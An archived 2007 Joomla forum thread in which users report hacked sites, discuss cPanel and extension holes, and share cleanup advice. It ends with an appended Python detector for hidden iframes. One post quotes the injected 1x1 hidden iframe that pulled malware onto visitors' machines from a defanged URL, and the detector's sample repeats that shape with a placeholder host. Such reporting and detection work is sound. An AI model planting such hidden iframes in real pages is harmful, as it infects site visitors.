Joomla!
http://forum.joomla.org/

two site hacked this week!!!
http://forum.joomla.org/viewtopic.php?f=267&t=133517
Page 1 of 2

Author:  jsm25 [ Sun Jan 21, 2007 11:30 pm ]
Post subject:  two site hacked this week!!!

I have had two Joomla websites hacked this week :-[. So this posting is a warning to others to take care.

I am running Joomla 1.0.12 on both sites and have followed the security advice on the forum as best as I can. All files have had their permissions set to 644 and folders to 755.

What’s happened is the hacker has added the following code to the end of index.php, which is not good. When I tried to access the home page my anti-virus software popped up and started moving files from the browser to the virus vault.

The index.php file had its permissions set to 644; I have now set it to 444 and just hope that this will stop them.

Author:  exrace [ Sun Jan 21, 2007 11:41 pm ]
Post subject:  Re: two site hacked this week!!!

Is your site on a shared host?

Author:  zimv20 [ Sun Jan 21, 2007 11:43 pm ]
Post subject:  Re: two site hacked this week!!!

wow, that sucks. i'd also like to see more details, like which version of php, how you turned off register globals, what kind of host(s) you are using, etc.

edit: oh yeah -- if you wouldn't mind, please list the 3rd-party stuff you're using

Author:  jsm25 [ Sun Jan 21, 2007 11:54 pm ]
Post subject:  Re: two site hacked this week!!!

Yes, it’s a shared host.
It's PHP version 4xx; I will check tomorrow and post full info.
All security settings such as global are set correctly.
When I start Joomla admin I do not get any warnings at the bottom of the page.

Author:  j2007 [ Mon Jan 22, 2007 9:53 am ]
Post subject:  Re: two site hacked this week!!!

I'm sorry to hear that  :(. Do you have a backup of your files?
I'm a newbie here, so I'll ask whether they also changed/erased other data, or just edited the index.php?

Author:  jsm25 [ Mon Jan 22, 2007 10:32 am ]
Post subject:  Re: two site hacked this week!!!

I have now found that the .htaccess file has been deleted; also I have set the file permissions to 444 in the root folder. However, as soon as I start the Joomla website the file permissions are set back to 644. Is this correct? Can Joomla do this?

PHP version 4.4.2
MySql version 4.1.21- standard
Apache version 1.3.36 - Unix

Author:  rliskey [ Wed Jan 24, 2007 3:01 am ]
Post subject:  Re: two site hacked this week!!!

Be sure to delete the entire directory and start from clean backups, or from scratch. Once they get in, there are many things they may have done to your site. Not much point in trying to figure out how many changes were made.

For more info, see: http://forum.joomla.org/index.php/topic,81058.0.html

Author:  jsm25 [ Wed Jan 24, 2007 8:54 am ]
Post subject:  Re: two site hacked this week!!!

I have fully reinstalled the site over the old site, is this sufficient?  Or should I have the web host delete the site and then start again?

Author:  cowboyfred [ Thu Jan 25, 2007 2:32 am ]
Post subject:  Re: two site hacked this week!!!

I just had my site hacked also >:(.  They hacked into my index file and installed that nice little ----
"
"  ----
My host guy found it and removed the code and everything seems to be fine for now.  i changed all passwords.
He says they got in through Joomla. 
So, what does a person do to keep them out!!

Author:  rliskey [ Thu Jan 25, 2007 3:36 am ]
Post subject:  Re: two site hacked this week!!!

Quote:
So, what does a person do to keep them out!!


1) Read this: http://forum.joomla.org/index.php/topic,81058.0.html

2) Delete the entire public_html directory and reinstall from clean backups or from original installs. Once they get in, there are many things they may have done to your site, and you may never find all Trojan Horses, meaning you may get attacked again at any time.

Author:  rliskey [ Thu Jan 25, 2007 6:44 am ]
Post subject:  Re: two site hacked this week!!!

Quote:
I have fully reinstalled the site over the old site, is this sufficient?  Or should I have the web host delete the site and then start again?


Depends on how the reinstall was done. A complete reinstall would take care of Joomla file issues, but if a non-Joomla file was added to a standard Joomla directory, then reinstalling Joomla probably would not affect that file. That's why I recommend totally deleting the directory and creating a new one before reinstalling. That guarantees a complete new install with no lingering Trojan Horses.

Of course you can also mess around with "rm -R *" which does essentially the same thing.

Author:  brian [ Thu Jan 25, 2007 10:42 am ]
Post subject:  Re: two site hacked this week!!!

cowboyfred wrote:
I just had my site hacked also >:(.  They hacked into my index file and installed that nice little ----
"
"   ----
My host guy found it and removed the code and everything seems to be fine for now.  i changed all passwords.
He says they got in through Joomla. 
So, what does a person do to keep them out!!



This particular hack is not a Joomla hack. It has been reported elsewhere (back in September I think) as a hack in cpanel. Cpanel released a patch to fix this.

Author:  exrace [ Thu Jan 25, 2007 12:42 pm ]
Post subject:  Re: two site hacked this week!!!

I would suggest finding another hosting company who has better controls and knowledge of their setups.

Author:  brian [ Thu Jan 25, 2007 12:44 pm ]
Post subject:  Re: two site hacked this week!!!

Also you should do a virus scan of your local PC as this hack attempts to download a virus to the computer of every visitor to your site

Author:  cowboyfred [ Thu Jan 25, 2007 3:49 pm ]
Post subject:  Re: two site hacked this week!!!

Thanks for all the info ;D  As far as i know, looking at my files and research on the web the attack is just inserting the "I-frame" and not messing up the site.  Their attack is the site's users, gaining access to the users' computers, not the website.  Because, if the site is messed up then no one will visit the site.
???UNLESS???!!!  They have also hidden a code to gain access back to the site and infect it again.  This is just an idea.

Also, i use camelot hosting and i informed him of a possible hack.  He immediately fixed the hack and even gave me a phone call to explain and make sure that everything is ok.  Now, that is customer service :D

Author:  brian [ Thu Jan 25, 2007 4:35 pm ]
Post subject:  Re: two site hacked this week!!!

No, customer service would have been to apply the fix when it was released months ago and not leave you vulnerable.

Author:  rliskey [ Thu Jan 25, 2007 5:09 pm ]
Post subject:  Re: two site hacked this week!!!

@ brian

I was wondering how you are able to tell from this code insert that it's a cPanel attack? I would have thought it could also be done by a Trojan Horse or through the J! Template Mgr. Are you saying it has to have been a cPanel attack because of the file permissions (644)?

Author:  brian [ Thu Jan 25, 2007 5:11 pm ]
Post subject:  Re: two site hacked this week!!!

I am saying that it's a cpanel attack as back in September (iirc) this exact same hack occurred and after discussions on the webhostingtalk and cpanel forums cpanel released a patch.

If as a mod you have access to the xxxxx in the first post just google for it and you will get the links, otherwise pm me.

Author:  studiomejia [ Thu Jan 25, 2007 6:30 pm ]
Post subject:  Re: two site hacked this week!!!

My site got hacked today
I installed 1.0.12 about 2 weeks ago
I moved the files the hacker installed to a folder and here are the links
[MOD NOTE: LINKS TO SCRIPT KIDDIE GRAFFITI REMOVED]

Author:  cowboyfred [ Thu Jan 25, 2007 9:56 pm ]
Post subject:  Re: two site hacked this week!!!

studiomejia wrote:
My site got hacked today
I installed 1.0.12 about 2 weeks ago
I moved the files the hacker installed to a folder and here are the links
[MOD NOTE: LINKS TO SCRIPT KIDDIE GRAFFITI REMOVED]



dang you really got hacked.  my hacker just installed that little I-frame download/redirect.

Author:  candihot [ Sat Jan 27, 2007 11:39 pm ]
Post subject:  Re: two site hacked this week!!!

my joomla site was hacked last night or today early morning. I won't give that duckass the benefit of the doubt mentioning his/her name, but they shut down my site. How are these hackers able to find, target and disable joomla sites? Is there some spider/bot that searches the web for Joomla tags? I've removed any joomla meta tags, but it seems they have other ways of finding Joomla sites.
Does the following information lend any clues as to what I must do to reestablish my site:

HACKED BY XXXXX; (duckass left a weblink here too)
Warning: main() [function.main]: open_basedir restriction in effect. File(/includes/version.php) is not within the allowed path(s): (/home/xxxx:/usr/lib/php:/usr/local/lib/php:/tmp) in /home/xxxx/public_html/xxxx/includes/joomla.php on line 71

Warning: main(/includes/version.php) [function.main]: failed to open stream: Operation not permitted in /home/xxx/public_html/xxx/includes/joomla.php on line 71

Fatal error: main() [function.require]: Failed opening required '/includes/version.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/public_html/xxx/includes/joomla.php on line 71

Author:  exrace [ Sun Jan 28, 2007 12:25 am ]
Post subject:  Re: two site hacked this week!!!

There are other fingerprints a Joomla site has other than the meta tags, like index.php?option=com_frontpage, but it is possible they gained access from another account on your host's server.

You might want to have your host check things over and review your log files and be sure you are running the latest versions of Joomla and any trusted 3rd party extensions.

Many of these types of attacks are from a compromised account on another site on a shared host.

Author:  SZippy [ Sun Jan 28, 2007 1:01 am ]
Post subject:  Re: two site hacked this week!!!

Been hacked here also

I have been picking through folder after folder for about 3.5 hrs now.
Irc hacks and back doors all over the place.
This started right after the 1.0.12 upgrade. And this was on two sites, one that was just installed without any outside modules or components. I just started to work on this site. Our provider states there is a hole in Joomla that let them in.

Now what ???  Our site has been trashed and the backup is probably not going to help.

SZippy 


Update 2227est 27jan07  Still at it since 1730est. Most every folder had something hidden in it.  The biggest hit was the cgi-bin and administrator/components/com_linkdirectory folder. >:(

Author:  cowboyfred [ Sun Jan 28, 2007 1:13 am ]
Post subject:  Re: two site hacked this week!!!

when i was hacked i was running Joomla 1.0.10.  with a bunch of extensions, mods...  Then after the hack i upgraded to the 1.0.12.  My hoster also said it was Joomla, but of course no one is admitting any guilt.  I don't care who is at fault ??? 

Let's just get this problem solved.  I wish i knew more to help solve this problem, but i am an amateur dude.  It would be nice if there was a way to start a forum, database, or some type of way to compare sites that each person had installed, setups, versions, etc. that were hacked to narrow down where the gate is.  Although we wouldn't be able to publicly post these 'cause then the hackers would love us even more.  Just an idea.

Author:  jsm25 [ Mon Jan 29, 2007 12:11 am ]
Post subject:  Re: three site hacked this week

It's three times this week now  :( and I am getting fed up.  Same as last time the hack added lines of code to the index.php and this time to the index2.php file as well.  Also a lot more lines were added to the file.

I have set the file permissions to 644, all Joomla settings are correct, so I just don’t know what to do now.  I will however delete the site and start afresh next week and see how that does.

A small utility to monitor the two files would be useful and one which could copy the proper files back would be splendid.  I know it's not an answer to the security issue but it would stop this hack.

Author:  alamgir99 [ Mon Jan 29, 2007 12:33 am ]
Post subject:  Re: two site hacked this week!!!

jsm25 wrote:
A small utility to monitor the two files would be useful and one which could copy the proper files back would be splendid.  I know it's not an answer to the security issue but it would stop this hack.


These are the two files you see. There are possibly dozens of others modified by the cracking scripts. If you have followed the security guidelines on this forum, your site would have been safe. There are millions of other safe sites using Joomla.

alamgir

Author:  rliskey [ Mon Jan 29, 2007 12:42 am ]
Post subject:  Re: two site hacked this week!!!

Quote:
Let's just get this problem solved.  I wish i knew more to help solve this problem, but i am an amateur dude.  It would be nice if there was a way to start a forum, database, or some type of way to compare sites that each person had installed, setups, versions, etc. that were hacked to narrow down where the gate is.  Although we wouldn't be able to publicly post these 'cause then the hackers would love us even more.  Just an idea.


Check if this helps: http://forum.joomla.org/index.php/topic,130926

Author:  jsm25 [ Mon Jan 29, 2007 8:54 am ]
Post subject:  Re: two site hacked this week!!!

My Recommendations

If you are using cpanel change your password, don’t leave the one you were given and change it frequently.

Check file and folder permissions and don’t forget your root folder public_html; this folder can quite easily be overlooked.

Author:  berrigorri [ Sun Feb 11, 2007 1:05 pm ]
Post subject:  Re: two site hacked this week!!!

i found last night my site hacked, the index.php and index2.php deleted, and an index.html created

i think the hole is com_babackup

i found the index.html, 7us.php and use.php (is a PHP/C99Shell.A trojan) in /administrator/com_babackup/classes changed..

grffggfgrttllñlkrt !!

Author:  yusufsel [ Mon Feb 26, 2007 1:21 pm ]
Post subject:  Re: two site hacked this week!!!

My 4 Joomla sites were hacked by the same method. I use Joomla version 1.0.12. My other Joomla versions are not hacked.
the hacker has added the following code to joomla main directory index.php first line.

Code:
<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0
src="h**p://traff.step57.info/10/"></iframe><!-- ~ -->


I clean the codes.

And I use plesk 8.01. I run rkhunter on the plesk panel to scan the server but it does not find any virus or trojan... I checked permissions, but the code was added again...

please help
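An added example, not part of any post in this thread: a detector for invisible frames of the shape quoted above (1x1 size, unquoted attributes, tag split across lines), which can be run over a site's PHP and HTML files during cleanup. The sample text and its `example.invalid` hosts are constructed placeholders.

```python
import re

IFRAME = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

# Constructed sample: a PHP entry point, an ordinary visible embed, and an
# injected frame written the way the post above shows it (placeholder host).
SAMPLE = """<?php
require 'includes/joomla.php';
?>
<iframe src="https://example.invalid/video" width="560" height="315"></iframe>
<!-- ~ --><iframe width=1 height=1 border=0 frameborder=0
src="http://injected.example.invalid/10/"></iframe><!-- ~ -->
"""


def parse_attrs(raw):
    """Parse quoted and unquoted HTML attributes into a lower-cased dict."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR.finditer(raw)}


def is_hidden(attrs):
    """True when the frame is sized or styled so a visitor cannot see it."""
    def tiny(value):
        m = re.match(r"\s*(\d+)", value or "")
        return m is not None and int(m.group(1)) <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    return (tiny(attrs.get("width")) or tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def find_hidden_iframes(text):
    """Return (line_number, src) for every hidden iframe found in text."""
    hits = []
    for m in IFRAME.finditer(text):
        attrs = parse_attrs(m.group(1))
        if is_hidden(attrs):
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, attrs.get("src", "")))
    return hits


if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE))
```

A clean result from this check only means no frame of this shape was found; as the replies above note, other files may have been added or changed.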
